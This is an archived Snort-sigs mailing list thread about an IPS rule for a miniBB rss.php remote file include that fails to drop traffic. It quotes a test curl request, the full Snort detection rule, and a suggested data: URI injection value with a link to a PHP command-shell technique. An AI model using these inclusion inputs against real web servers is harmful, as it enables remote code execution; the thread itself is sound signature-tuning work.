'Re: [Snort-sigs] IPS packet reject handling doesn't work as expected'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       snort-sigs
Subject:    Re: [Snort-sigs] IPS packet reject handling doesn't work as expected
From:       Jamie Riden <jamie.riden () gmail ! com>
Date:       2013-01-26 22:54:07
Message-ID: CAHno4i8uHrPUhNUuCmZyiS2ZhUGg_xq=QcucRxx4kCi1z0-JAQ () mail ! gmail ! com
[Download RAW message or body]

As an aside, I think this (and similar sigs) should be extended to
cover the data: URI case, e.g.
pathToFiles=data://text/plain;base64,SSBsb3Z..

I've tested data: URIs as file include targets and they seem to work
ok if you have the appropriate allow_url_ setting.

cf: http://www.idontplaydarts.com/2011/03/php-remote-file-inclusion-command-shell-using-data-stream/

cheers,
 Jamie

On 25 January 2013 18:00, Lukas Matt <lukas.matt@sophos.com> wrote:
> Hello @all,
>
> I have following setup:
>
> DNAT rule to make an internal webserver reachable by using the external IP
> address.
>
> command from client to server:
> curl -v -s 'http://[hostname]/rss.php?pathToFiles=https'
>
> triggered rule:
> 2931/finished_pullpork_rules/plain.rules:alert tcp $EXTERNAL_NET any ->
> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP miniBB rss.php pathToFiles remote
> file include attempt"; flow:to_server,established; content:"rss.php";
> nocase; http_uri; content:"pathToFiles="; nocase; http_uri;
> pcre:"/pathToFiles=(ftp|https?)/Ui"; metadata:policy security-ips drop,
> service http; reference:url,osvdb.org/show/osvdb/51460;
> classtype:web-application-attack; sid:18479; rev:7;)
>
> So from my view the incoming GET request from my IP should be rejected (or
> maybe dropped).
> But in the tcpdump I can see that this GET request routed to the internal
> webserver.
>
> It worked fine after I removed the perl regex from the rule and the
> content-modifier http_uri.
>
> What exactly  could be wrong with the regex/modifier?
>
> Regards,
> Lukas Matt

-- 
Jamie Riden / jamie@honeynet.org / jamie.riden@gmail.com
http://uk.linkedin.com/in/jamieriden

------------------------------------------------------------------------------
Master Visual Studio, SharePoint, SQL, ASP.NET, C# 2012, HTML5, CSS,
MVC, Windows 8 Apps, JavaScript and much more. Keep your skills current
with LearnDevNow - 3,200 step-by-step video tutorials by Microsoft
MVPs and experts. ON SALE this month only -- learn more at:
http://p.sf.net/sfu/learnnow-d2d
_______________________________________________
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!
[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic